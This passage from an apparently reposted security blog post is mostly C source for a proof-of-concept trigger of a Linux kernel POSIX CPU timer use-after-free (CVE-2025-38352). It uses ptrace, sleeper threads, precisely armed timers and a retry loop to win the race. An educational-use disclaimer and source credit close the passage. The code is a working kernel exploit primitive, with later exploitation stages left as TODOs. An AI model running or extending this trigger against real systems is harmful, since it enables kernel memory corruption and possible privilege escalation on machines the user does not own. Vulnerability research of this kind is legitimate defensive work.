    SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &uaf_timer));

    // Wait for the main thread to arm the timers. This is to make sure
    // this thread does not use CPU time to arm the timers.
    pthread_barrier_wait(&barrier); // barrier 2
    pthread_barrier_wait(&barrier); // barrier 3

    // Waste just the right amount of CPU time now without firing any of the timers
    for (int i = 0; i < ((ONE_MS_NS / getpid_avg) - syscall_loop_times); i++) {
        syscall(__NR_getpid);
    }

    // This `return` will trigger `do_exit()` in the kernel, which hopefully will
    // fire the timers after `exit_notify()` wakes up the `waitpid()` in the exploit
    // parent process
    return;
}

void sleep_func(void) {
    // same CPU as REAPEE thread
    pin_on_cpu(2);
    char m;

    prctl(PR_SET_NAME, "SLEEPER");

    // Block and sleep without using the CPU
    read(stall_fds[0], &m, 1);
}

int main(int argc, char *argv[]) {
    // Loop for wrapper process
    while (1) {
        // Wrapper process setup
        printf("Wrapper: try %d\n", ++retry_count);
        SYSCHK(pipe(e2w));
        pid_t exploit_pid = SYSCHK(fork());

        if (exploit_pid) {
            // wrapper process (pinning CPU here doesn't matter)
            char m;
            close(e2w[1]);

            // Blocking read until retry
            int read_count = read(e2w[0], &m, 1);

            // If read_count > 0, retry
            if (read_count == 0) break;

            // Increase `syscall_loop_times` for the next retry (this means fewer
            // `getpid()` iterations), wrapping back to 20 once it goes past
            // SYSCALL_LOOP_TIMES_MAX
            syscall_loop_times++;
            syscall_loop_times %= SYSCALL_LOOP_TIMES_MAX+1;
            syscall_loop_times = syscall_loop_times == 0 ? 20 : syscall_loop_times;

            // Close pipes so they can be recreated again
            close(e2w[0]);

            // Wait for exploit to exit
            waitpid(exploit_pid, NULL, __WALL);
        } else {
            // exploit process
            char m;
            close(e2w[0]);

            // Parent and child setup
            // Use pipes to communicate between parent and child
            SYSCHK(pipe(c2p));
            SYSCHK(pipe(p2c));

            // Get the average CPU time usage of the `getpid()` syscall, so we
            // can use it for the trigger later
            getpid_avg = getpid_cpu_usage();

            pid_t pid = SYSCHK(fork());

            if (pid) {
                // exploit parent process
                pin_on_cpu(1);
                char m;
                close(c2p[1]);
                close(p2c[0]);

                prctl(PR_SET_NAME, "EXPLOIT_PARENT");

                // Receive child process's REAPEE thread's TID
                pid_t tid;
                SYSCHK(read(c2p[0], &tid, sizeof(pid_t)));

                // Attach to the REAPEE thread and continue it
                SYSCHK(ptrace(PTRACE_ATTACH, tid, NULL, NULL));
                SYSCHK(waitpid(tid, NULL, __WALL));
                SYSCHK(ptrace(PTRACE_CONT, tid, NULL, NULL));

                // Signal to child that we attached and continued
                SYSCHK(write(p2c[1], &m, 1));

                // Reap the REAPEE thread now. This will block and wait until
                // the REAPEE thread is able to get through `exit_notify()` and
                // wake this parent process up.
                SYSCHK(waitpid(tid, NULL, __WALL));

                // At this point, if UAF timer fired at the right time, the REAPEE thread
                // will be reaped while its `tsk->exit_state` is set to `EXIT_ZOMBIE`.
                //
                // Let the child process know REAPEE is reaped, so it can delete the
                // timer.
                SYSCHK(write(p2c[1], &m, 1));

                // Let the child process delete and free the timer, and
                // all threads before exiting
                SYSCHK(read(c2p[0], &m, 1));

                // Signal to wrapper process to retry and exit
                // TODO exploit: Figure out how to detect if we triggered UAF here
                SYSCHK(write(e2w[1], &m, 1));

                // Wait for child to exit before exiting
                waitpid(pid, NULL, __WALL);
                close(e2w[1]);
                close(c2p[0]);
                close(p2c[1]);
                exit(0);
            } else {
                // exploit child process
                pin_on_cpu(0);
                char m;
                close(c2p[0]);
                close(p2c[1]);

                // Pipefd for sleep threads to block on
                SYSCHK(pipe(stall_fds));

                // Block SIGUSR1, blocks them in subsequent threads too
                sigset_t mask;
                sigemptyset(&mask);
                sigaddset(&mask, SIGUSR1);
                sigprocmask(SIG_BLOCK, &mask, NULL);

                prctl(PR_SET_NAME, "EXPLOIT_CHILD");
                pthread_barrier_init(&barrier, NULL, 2);

                // Change this depending on KASAN vs no KASAN
                int num_sleep_threads = NUM_SLEEP_THREADS;
                pthread_t sleep_threads[num_sleep_threads];

                SYSCHK(pthread_create(&reapee_thread, NULL, (void*)reapee_func, NULL));

                for (int i = 0; i < num_sleep_threads; i++) {
                    int ret = pthread_create(&sleep_threads[i], NULL, (void*)sleep_func, NULL);
                    if (ret != 0) {
                        // If this condition is reached, change `num_sleep_threads` above
                        printf("Failed on thread %d\n", i+1);
                        num_sleep_threads = i;
                        break;
                    }
                }

                // Wait for all threads to create and go to sleep
                usleep(10 * 1000);

                // Parent process writes to us when attached and continued, use
                // a barrier to continue the REAPEE thread now
                SYSCHK(read(p2c[0], &m, 1));
                pthread_barrier_wait(&barrier); // barrier 1

                // Wait for timers to be created by REAPEE thread
                pthread_barrier_wait(&barrier); // barrier 2

                // Arm the timers now, ensuring the first 18 are before the
                // UAF timer
                struct itimerspec ts = {
                    .it_interval = {0, 0},
                    .it_value = {
                        .tv_sec = 0,
                        .tv_nsec = ONE_MS_NS - 1,
                    },
                };

                for (int i = 0; i < NUM_TIMERS; i++) {
                    timer_settime(stall_timers[i], 0, &ts, NULL);
                }

                // Arm UAF timer as the latest one
                ts.it_value.tv_nsec = ONE_MS_NS;
                timer_settime(uaf_timer, 0, &ts, NULL);

                // Timers are armed, let REAPEE thread continue
                pthread_barrier_wait(&barrier); // barrier 3

                // Parent process writes to us when waitpid() returns successfully.
                //
                // At this point, if we won the race, `handle_posix_cpu_timers()` will be in
                // the race window, and `timer_delete()` should see a NULL `sighand`, which
                // will cause it to just free the timer unconditionally.
                SYSCHK(read(p2c[0], &m, 1));

                // The race window is open for at least 3ms generally, so we can sleep
                // 1ms to increase our chances to hit it with our free here.
                //
                // Might need to modify this for different systems, because it depends on
                // how much time the race window is open for. KASAN will also not allow
                // as many sleeper threads, so this will need to be lowered a bit if it's
                // enabled.
                usleep(1 * 1000);
                timer_delete(uaf_timer);

                // Let the timer be freed by RCU, then let the parent process know it can exit
                wait_for_rcu();

                // At this point, either the UAF triggered, and you'll see the kernel warning
                // or KASAN splat, or we failed.
                //
                // TODO exploit: Figure out how to detect if we won the race here
                for (int i = 0; i < num_sleep_threads; i++) {
                    write(stall_fds[1], &m, 1);
                }
                for (int i = 0; i < num_sleep_threads; i++) {
                    pthread_join(sleep_threads[i], NULL);
                }

                // Signal to parent to exit
                SYSCHK(write(c2p[1], &m, 1));

                // Wait for parent to exit
                close(c2p[1]);
                close(p2c[0]);
                close(stall_fds[0]);
                close(stall_fds[1]);
                exit(0);
            }
        }
    }

    // If we break out of the while loop above, the race was won
    // TODO exploit:
    exit(0);
}


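Disclaimer: This blog post is for educational and research purposes only. All techniques and code samples provided are intended to help defenders understand attack techniques and improve their security posture. Do not use this information to access or interfere with systems you do not own or do not have explicit permission to test. Unauthorized use may violate laws and ethical guidelines. The author accepts no responsibility for any misuse or damage resulting from applying the concepts discussed.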


Reposted from: securitainment, Faraz Faraz, "CVE-2025-38352 Part 2 – Extending The Race Window Without a Kernel Patch"